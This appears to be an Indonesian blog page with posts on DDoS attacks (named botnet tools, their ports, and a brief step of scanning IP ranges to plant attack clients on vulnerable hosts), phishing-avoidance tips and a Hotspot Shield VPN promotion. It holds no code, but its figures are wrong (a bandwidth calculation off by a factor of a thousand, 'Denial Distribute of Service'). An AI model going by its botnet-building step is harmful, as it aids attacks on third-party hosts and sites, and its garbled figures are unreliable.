Langkah ini merupakan dasar basic memulai hacking dengan sangat mudah, mungkin ada tambahan untuk Google Hacking (Hacking Sebuah Web Dengan Memanfaatkan Google) diatas, silahkan melalui kotak komentar.
Baca selengkapnya »»  
0 komentar

Serangan DDOS

PENGERTIAN DENIAL DISTRIBUTE OF SERVICE (DDOS)
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut [01]. Serangan Denial of Service (DOS) ini terjadi apabila penyerang atau yang sering terdengar dengan istilah hacker ini merusak host atau sevice yang ada sehingga host atau service itu tidak dapat lagi berkomunikasi secara lancar di dalam network neighborhood-nya [03]. Perkembangan dari serangan DOS adalah DDOS. Serangan DDoS adalah jenis serangan dengan cara memenuhi trafik server situs tersebut hingga situs menjadi lambat dan susah diakses [02]. Pengertian lain tentang DDOS adalah mengirimkan data secara terus menerus dengan menggunakan satu komputer tidak begitu efektif karena biasanya sumber daya server yang diserang lebih besar dari komputer penyerang [04].
Dari beberapa pengertian di atas dapat disimpulkan bahwa serangan DDOS (Denial Distribute Of Service) sangat merugikan bagi yang diserang, karena serangan ini dapat menghambat kerja pengguna dari komputer korban. Dimana komputer korban menjadi lambat dan sulit untuk diakses akibat dari penuhnya trafik dalam komputer tersebut


CARA KERJA SERANGAN DDOS
Cara kerja DDOS dalam melakukan serangan kepada situs yang diinginkan. Secara sederhana serangan DDOS bisa dilakukan dengan menggunakan perintah “ping” yang dimiliki oleh windows. Proses “ping” ini ditujukan kepada situs yang akan menjadi korban. Jika perintah ini hanya dilakukan oleh sebuah komputer, perintah ini mungkin tidak menimbulkan efek bagi komputer korban. Akan tetapi, jika perintah ini dilakukan oleh banyak komputer kepada satu situs maka perintah ini bisa memperlambat kerja komputer korban.
Satu komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi. Dan server dari situs yang dituju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang. Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan “Ping” ke situs yang di tuju [05].

BEBERAPA SOFTWARE YANG DIGUNAKAN UNTUK MELANCARKAN SERANGAN DDOS
Disini akan di bahas empat macam software yang bisa digunakan untuk melancarkan serangan DDOS [06].
1. The Tribal Flood Network (TFN).
TFN ini diciptakan oleh hacker yang cukup terkenal pada kalangan underground
yang bernama Mixter. Aplikasi ini memungkinkan penyerang membuat flood
connection dengan menggunakan protocol yang ada pada TCP/IP yaitu:

o UDP, difokuskan pada domain name system dan network management program.
o TCP, pusat e-mail dan web transaksi.
o ICMP, digunakan oleh para professional untuk troubleshooting network.
o Nama program masternya adalah : tribe.c dan program daemon bernama td.c
2. Trin00
Software ini menggunakan UDP untuk mengirimkan flood packets network. Port yang digunakan adalah:
o Attack to Master : TCP Port 27665
o Master to Daemon : UDP Port 27444
o Daemon to Master(s) : UDP Port 31335
Program master : master.c dan program Daemon : ns.c
Program ini tidak bagus untuk digunakan karena master dan daemon
berhubungan dengan clear text.

3. Stacheldraht
Nama program ini dalam bahasa Jerman yang berarti “Barb Wire”. Sama sepeti TFN software ini menggunakan UDP, TCP, ICMP dalam menciptakan rootshell pada port port yang ada. Menggunakan komunikasi encrypt antar master dan daemon. Memiliki kemampuan mengupdate daemonnya sendiri secara otomatis.
Maka dari itu program ini paling effisien dan cukup berbahaya.
o Port TCP : 16660 dan 60001
o Master program bernama : mserv.c dan daemon program bernama : td.c
o Program ini memiliki client yang juga sebagai telnet : client.c
Komunikasi antara master dan agent menggunakan ICMP dan TCP sedangkan TFN hanya menggunakan ICMP.
4. TFN2K
Di realease pada tgl 21 Desember 1999. Seperti halnya Stacheldraht program ini meng encrypt tranmision. Berjalan pada platform Windows NT. Tetapi program ini lebih mudah di trace pada daemonnya.


CARA MENGINSTALASI PROGRAM DDOS
Untuk menginstalasi program DDOS, master atau daemon node harus dikomunikasikan terlebih dahulu sehingga mendapatkan trust security. Untuk mendapatkan trust security dengan cara yang sangat mudah, gunakan scan tool dari range IP di internet kemudian setelah mendapatkan host-host tsb, baru diinstall client software pada host-host yang masih full of hole security. Software client tersebut dapat di uninstall dengan cara di set terlebih dahulu, di uninstall setelah berapa kali serangan[06].

EFEK DARI SERANGAN DDOS
Efek dari serangan DDOS sangat menganggu pengguna internet yang ingin mengunjungi situs yang telah diserang menggunakan DDOS. Situs yang terserang DDOS sulik untuk diakses bahkan mungkin tidak bisa untuk diakses. Kesulitan pengaksesan sebuah situs diinternet bisa saja merugikan bagi sebagian orang yang bisnisnya sangat tergantung kepada layanan internet.
Secara umum end user atau korban serangan DDOS ini hanya sadar bahwa serangan seperti ini hanya merupakan gangguan yang memerlukan restart system.
Serangan DDOS ini juga dapat merupakan pengalihan point of view dari si hacker
untuk mendapatkan informasi penting yang ada. Pada dasarnya serangan DOS ini
merupakan rangkaian rencana kerja yang sudah disusun oleh hacker dalam mencapai
tujuannya yang telah ditargetkan[06].

Dari pernyataan di atas dapat disimpulkan bahwa serangan DDOS tidak semata-mata hanya untuk membuat web server kelebihan beban akan tetapi merupakan sebuah taktik untuk mencapai tujuan tertentu. Tujuan itu bisa saja persaingan bisnis supaya layanan dari situs saingan terhambat.
Baca selengkapnya »»  
Sabtu, 22 Mei 2010 0 komentar

Mengenal teknik pencurian dengan Email Phising


Mengenal teknik pencurian dengan Email Phising - Di zaman sekarang orang sudah familiar dengan yang namanya e-mail, dari anak-anak sampai orang dewasa pun sudah tahu apa itu namanya e-mail. Karena fasilitas yang satu ini banyak sekali kegunaanya, kita bisa kirim data, kirim foto, ataupun kirim aplikasi dengan hanya hitungan detik, menit ato jam. Dan ini lebih cepat dari pada kita memakai jasa travel.

Tapi di sisi lain e-mail juga bisa membuat kita kehilangan apa yang kita punya, dalam hal ini biasanya adalah uang. Dalam kesempatan ini kita akan membicarakan masalah yang kaitannya dengan e-mail. Masalah yang akan kita bahas adalah tentang E-mail Phising.

Sebelumnya kita harus mengerti apakah itu yang namanya e-mail phising itu?

“Phising merupakan teknik hacking yang digunakan oleh pencuri (cracker / hacker jahat) untuk menipu pengguna internet dengan cara mencuri informasi penting, biasanya hal ini berkenaan dengan informasi keuangan (nomor rekening dan kartu kredit) dan informasi login (ID dan password).

Biasanya sasaran para penjahat ini adalah, orang yang bertransaksi secara online melalui website perbankan. Dengan cara mereka membuat e-mail palsu yang sangat mirip sekali dengan e-mail resmi dari institusi keuangan. Biasanya isi pesan dari e-mail palsu ini sangat meyakinkan sekali, karena sangat mirip sekali dengan e-mail yang resmi. Sehingga orang yang tidak tahu pasti akan mengunjungi website tersebut.

Dan user yang sudah login ke website tersebut, pastinya akan mulai mengisikan formulir informasi tentang data pribadinya dan keuangannya. Maka informasi yang sudah tertulis tersebut sudah mulai masuk ke database penjahat atau hacker tersebut, dengan demikian para penjahat tersebut dengan sangat leluasa memindahkan data-data atau isi rekening tersebut ke rekening si penjahat tersebut. Biasanya orang yang sudah tertipu tersebut baru menyadarinya saat dirinya mendapatkan atau menerima surat pernyataan dari bank atau penerbit kartu kreditnya tersebut.

Sebaiknya untuk menghindari penipuan terhadap e-mail phising ini, kita harus mengerti beberapa tips agar kita tidak tertipu. Berikut ada beberapa tips dari kami, semoga tips tersebut dapat membantu anda.


Jangan langsung membalas e-mail yang berasal dari insitusi keuangan, sebelum itu coba hubungi dulu pihak bank anda untuk memastikan kebenaran e-mail tersebut.


Perhatikan kesalahan ketik atau tata bahasa yang kurang tepat pada pesan e-mail yang telah dikirimkan.


Cermati simbol @ pada alamat website yang tertera pada pesan e-mail. Bisa jadi alamat website tersebut bertuliskan: www.citibank.com@www.hackersite.com. Browser tidak akan memproses semua tulisan sebelum simbol “@”. Jadi, pencuri bisa saja meletakkan alamat website pribadinya setelah simbol “@”. Website tersebutlah yang akan anda kunjungi, untuk itu sebaiknya selalu perhatikan alamat website yang tertera pada link.


Biasanya beberapa karakter dalam alamat website bank bisa diganti dengan karakter yang hampir sama. Sebagai contoh, situs Asli milik Bank BCA yaitu www.klikbca.com disamarkan menjadi www.klickbca.com. Sekilas memang terlihat sama. Tetapi jika anda tidak menyadari perbedaan ini akan sangat Fatal akibatnya.


Saat website bank ditampilkan, perhatikan icon gembok yang berda di bagian bawah browser Website. Jika ada, berarti website tersebut aman. Jika icon gembok tidak ada, segera tutup browser tersebut.

Semoga bermanfaat sedikit Pengertian tentang Email Phising diatas.
Baca selengkapnya »»  
0 komentar

Menyembunyikan IP dengan Hotspot Shield

Menyembunyikan IP dengan Hotspot Shield - Fungsi tools Hotspot Shield untuk melindungi anda dan IP anda sehingga tidak terdeteksi pada saat anda browsing, lebih utama lagi pada saat anda menggunakan wireless. Tetapi dalam hal ini karena program ini membuat VPN (virtual private network) sehingga membuat anda memungkinkan untuk membuat ID @att dan @btinternet.
download dan install program ini lalu jalankan dan koneksikan maka anda akan bisa membuat ID @att dan @btinternet dengan menggunakan tools di ID maker untuk membuat ID tersebut.
berikut ini adalah penjelasan dari pembuat tools tersebut yang saya terjemahkan dengan terjemahan google :
Web untuk melindungi keamanan Anda, privasi dan anonimitas! Get behind the SHIELD! Dapatkan di belakang SHIELD!




- Secure web Anda sesi dengan enkripsi HTTPS.
- Sembunyikan alamat IP Anda untuk privasi online Anda.
- Mengakses semua konten secara pribadi tanpa sensor; bypass firewall.
- Lindungi diri Anda dari snoopers di Wi-Fi hotspot, hotel, bandara, kantor perusahaan dan ISP hub.
- Bekerja pada nirkabel dan koneksi kabel sama.
- Mengamankan data & informasi pribadi di Internet

Hotspot Shield melindungi seluruh web surfing sesi; mengamankan koneksi Anda di kedua jaringan internet rumah Anda & Warung Internet jaringan (baik kabel dan nirkabel). Hotspot Shield melindungi identitas Anda dengan memastikan bahwa semua transaksi web (belanja, mengisi formulir, download) yang aman melalui HTTPS. Hotspot Shield juga membuat Anda pribadi online membuat identitas Anda tidak terlihat oleh situs web pihak ketiga dan ISP. Kecuali jika Anda memilih untuk masuk ke situs tertentu, Anda akan anonim untuk seluruh Web sesi dengan Hotspot Shield. Kita mengasihi web karena kebebasan yang menciptakan untuk mencari, mengatur, dan berkomunikasi. Hotspot Shield memungkinkan akses ke semua informasi secara online, memberikan kebebasan untuk mengakses semua konten web secara bebas dan aman. Aman seluruh web sesi dan memastikan privasi online; password, nomor kartu kredit, dan semua data anda diamankan dengan Hotspot Shield. Standar perangkat lunak antivirus melindungi komputer Anda, tapi tidak aktivitas web Anda.

Itu sebabnya AnchorFree adalah senang mempersembahkan Hotspot Shield. Aplikasi kita koneksi Internet Anda tetap aman, swasta, dan anonim.
100% Keamanan Melalui VPN


Hotspot Shield menciptakan virtual private network (VPN) antara laptop atau iPhone dan gateway Internet kita. Ini ditembus mencegah terowongan snoopers, hacker, ISP, dari melihat kegiatan browsing web Anda, pesan instan, download, informasi kartu kredit atau apa pun yang Anda kirim melalui jaringan. Hotspot Shield aplikasi keamanan gratis untuk men-download, menggunakan teknologi VPN terbaru, dan mudah untuk menginstal dan digunakan.





Baca selengkapnya »»  
 
;